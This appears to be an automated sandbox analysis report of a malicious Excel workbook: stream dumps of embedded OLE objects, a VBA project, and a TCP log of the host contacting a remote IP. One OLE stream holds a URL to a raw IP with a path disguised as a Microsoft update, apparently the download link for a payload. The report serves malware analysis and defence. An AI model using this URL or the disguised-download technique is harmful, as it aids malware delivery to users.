                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . N ] . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                  Stream Path: MBD00027431/\x1CompObj, File Type: data, Stream Size: 94
                                                  General
                                                  Stream Path:MBD00027431/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:94
                                                  Entropy:4.345966460061678
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD00027431/\x1Ole, File Type: data, Stream Size: 62
                                                  General
                                                  Stream Path:MBD00027431/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:62
                                                  Entropy:2.7788384466112834
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 4 .
                                                  Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 34 00
                                                  Stream Path: MBD00027431/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 20909
                                                  General
                                                  Stream Path:MBD00027431/CONTENTS
                                                  CLSID:
                                                  File Type:PDF document, version 1.7, 1 pages
                                                  Stream Size:20909
                                                  Entropy:7.967116806702583
                                                  Base64 Encoded:True
                                                  Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d
                                                  Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65
                                                  Stream Path: MBD00027432/\x1CompObj, File Type: data, Stream Size: 94
                                                  General
                                                  Stream Path:MBD00027432/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:94
                                                  Entropy:4.345966460061678
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD00027432/\x1Ole, File Type: data, Stream Size: 62
                                                  General
                                                  Stream Path:MBD00027432/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:62
                                                  Entropy:2.7788384466112834
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 .
                                                  Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00
                                                  Stream Path: MBD00027432/CONTENTS, File Type: PDF document, version 1.3, 1 pages, Stream Size: 180110
                                                  General
                                                  Stream Path:MBD00027432/CONTENTS
                                                  CLSID:
                                                  File Type:PDF document, version 1.3, 1 pages
                                                  Stream Size:180110
                                                  Entropy:7.9525248195720994
                                                  Base64 Encoded:True
                                                  Data ASCII:% P D F - 1 . 3 . . 1 0 o b j . . [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] . . e n d o b j . . 1 2 0 o b j . . < < / L e n g t h 1 8 8 8 / F i l t e r / F l a t e D e c o d e > > s t r e a m . . X . Z M o . 7 . . . P H . & 9 . P b 5 j . . Q . . J . \\ r W * | 0 D q . r . z ? . , . R . . . D . K P . . ^ < p ! . . . . L ; j . + r ^ . K V . + . a . . . . . Q a % Y } " / W O + ~ & . . > x & e A D & T y T . C . r . : ; ] % . % X / . 7 / S . . . t . . Y N P
                                                  Data Raw:25 50 44 46 2d 31 2e 33 0d 0a 31 20 30 20 6f 62 6a 0d 0a 5b 2f 50 44 46 20 2f 54 65 78 74 20 2f 49 6d 61 67 65 42 20 2f 49 6d 61 67 65 43 20 2f 49 6d 61 67 65 49 5d 0d 0a 65 6e 64 6f 62 6a 0d 0a 31 32 20 30 20 6f 62 6a 0d 0a 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 38 38 38 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 3e 3e 20 73 74 72 65 61 6d 20 0d 0a 58 09 ad 5a
                                                  Stream Path: MBD00027433/\x1CompObj, File Type: data, Stream Size: 99
                                                  General
                                                  Stream Path:MBD00027433/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:99
                                                  Entropy:3.631242196770981
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD00027433/Package, File Type: Microsoft Excel 2007+, Stream Size: 18938
                                                  General
                                                  Stream Path:MBD00027433/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:18938
                                                  Entropy:7.526620583250976
                                                  Base64 Encoded:True
                                                  Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD00027434/\x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:MBD00027434/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD00027434/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708
                                                  General
                                                  Stream Path:MBD00027434/\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:708
                                                  Entropy:3.6235698530352805
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                  Stream Path: MBD00027434/\x5SummaryInformation, File Type: data, Stream Size: 23248
                                                  General
                                                  Stream Path:MBD00027434/\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:23248
                                                  Entropy:3.0144932681512167
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00
                                                  Stream Path: MBD00027434/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 97808
                                                  General
                                                  Stream Path:MBD00027434/Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:97808
                                                  Entropy:7.364988158797062
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Stream Path: MBD00027435/\x1Ole, File Type: data, Stream Size: 656
                                                  General
                                                  Stream Path:MBD00027435/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:656
                                                  Entropy:4.827144323852925
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . = n k < . . . . . . . . . . . . . h . . . y . . . K . d . . . h . t . t . p . : . / . / . 9 . 1 . . . 9 . 2 . . . 2 . 4 . 4 . . . 9 . 6 . / . a . g . h . / . m . c . i . r . o . s . f . o . t . u . p . d . a . t . e . d . n . e . w . b . a . b . y . p . r . o . j . e . c . t . r . e . l . a . t . e . d . b . a . l . l . o . n . u . p . d . a . t . i . o . n . t . o . i . m . p . r . o . v . e . t . h . e . n . e . w . u . p . d . a . t . i . o . n . f . a . s . t . e . r . t . h . a . n . b . e . f
                                                  Data Raw:01 00 00 02 3d dc 6e 6b 91 3c c5 06 00 00 00 00 00 00 00 00 00 00 00 00 68 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 64 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 34 00 34 00 2e 00 39 00 36 00 2f 00 61 00 67 00 68 00 2f 00 6d 00 63 00 69 00 72 00 6f 00 73 00 66 00 6f 00 74 00 75 00 70 00 64 00 61 00 74 00 65 00 64 00
                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 206691
                                                  General
                                                  Stream Path:Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:206691
                                                  Entropy:7.997025735286371
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ' a . Z Q : . 3 9 L - ^ q B ' . d . L P B . 1 . . b @ K . . . . . . . . . . \\ . p . % . . . g . J . . \\ K ? 1 P . r , + e * \\ _ % 5 ( Q u } w b 1 r C G . 4 { # C S V . 0 . - B _ . U . Z . r Z . , ^ B . . . W . a . . . P . . . = . . . N @ W . . . g . y C ? E + . . . . . . . . . . . . . . . . . . ~ . . . s . . . E = . . . . . o . i . ^ ' @ . . . . . . . > C " . . . . Y . . . . / . . . . ( T . . . . 1 . . . . v j . y h F q W . B X v - m e 1 . . . y - = ~
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 e0 12 27 61 09 f7 5a 51 3a b3 a2 ff d1 a9 33 39 4c df 2d 93 5e 71 ad 42 27 c0 06 64 15 4c 50 a1 8b 42 1f f9 31 08 b4 bf cd 07 62 a7 40 9d 4b c3 e1 00 02 00 b0 04 c1 00 02 00 cf e3 e2 00 00 00 5c 00 70 00 b8 e0 ce 25 f5 f9 a6 d8 fe a7 2e 15 bf e9 91 a3 a2 67 2e a3 4a 7f 0e 5c 4b 3f 92 31 50 0b
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:517
                                                  Entropy:5.268039999786915
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 4 E 1 B 8 D C 1 - 2 E 5 3 - 4 A B E - 8 6 6 B - 9 9 8 4 3 1 6 1 A 6 F 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 8 9 A 7 A 7 8 7 E 7 8 7 E 7 8 7
                                                  Data Raw:49 44 3d 22 7b 34 45 31 42 38 44 43 31 2d 32 45 35 33 2d 34 41 42 45 2d 38 36 36 42 2d 39 39 38 34 33 31 36 31 41 36 46 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:104
                                                  Entropy:3.0488640812019017
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2644
                                                  Entropy:3.988256927218533
                                                  Base64 Encoded:False
                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:553
                                                  Entropy:6.366184806976514
                                                  Base64 Encoded:True
                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . g . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 17 1e d5 67 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 14, 2024 08:29:43.482129097 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.676256895 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.676348925 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.676589012 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.874193907 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874218941 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874233007 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874248028 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874264956 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874278069 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874289989 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874301910 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874314070 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874326944 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:43.874336004 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.874372005 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.874372005 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.874381065 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:43.880743980 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068391085 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068413019 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068424940 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068435907 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068447113 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068459034 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068471909 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068484068 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068495035 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068495989 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068506002 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068511963 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068525076 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068536043 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068542004 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068547964 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068558931 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068567038 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068569899 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068572044 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068582058 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068594933 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068597078 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068607092 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068619013 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068620920 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068629026 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.068640947 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068660021 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.068679094 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262594938 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262667894 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262697935 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262712955 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262726068 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262737989 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262738943 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262751102 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262763023 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262765884 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262770891 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262780905 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262783051 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262788057 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262795925 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262803078 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262814045 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262828112 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262840033 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262844086 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262852907 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262865067 CET804916291.92.244.96192.168.2.22
                                                  Feb 14, 2024 08:29:44.262868881 CET4916280192.168.2.2291.92.244.96
                                                  Feb 14, 2024 08:29:44.262877941 CET804916291.92.244.96192.168.2.22
